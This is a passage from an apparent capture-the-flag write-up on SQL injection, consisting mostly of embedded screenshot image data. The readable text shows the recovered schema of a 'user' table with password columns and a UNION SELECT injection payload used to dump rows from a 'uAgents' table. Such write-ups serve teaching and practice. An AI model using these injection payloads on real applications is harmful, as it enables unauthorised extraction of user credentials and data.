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) We get back table names `uAgents` and `user` with declarations as below ```sqlCREATE TABLE "uAgents" ( "id" INTEGER NOT NULL, "userAgent" VARCHAR(128) NOT NULL UNIQUE, "url" VARCHAR(128) NOT NULL, PRIMARY KEY("id"))CREATE TABLE "user" ( "id" INTEGER NOT NULL, "username" VARCHAR(40) UNIQUE, "password" VARCHAR(40), "email" VARCHAR(40) UNIQUE, "about" VARCHAR(1000), PRIMARY KEY("id"))``` Passing `' UNION ALL SELECT group_concat(userAgent), group_concat(url) FROM uAgents WHERE ''='` we can confirm the one row we already saw is the only row in the `uAgents` table (using `COUNT` I didn't seem to get a response). ![](data:image/png;base64,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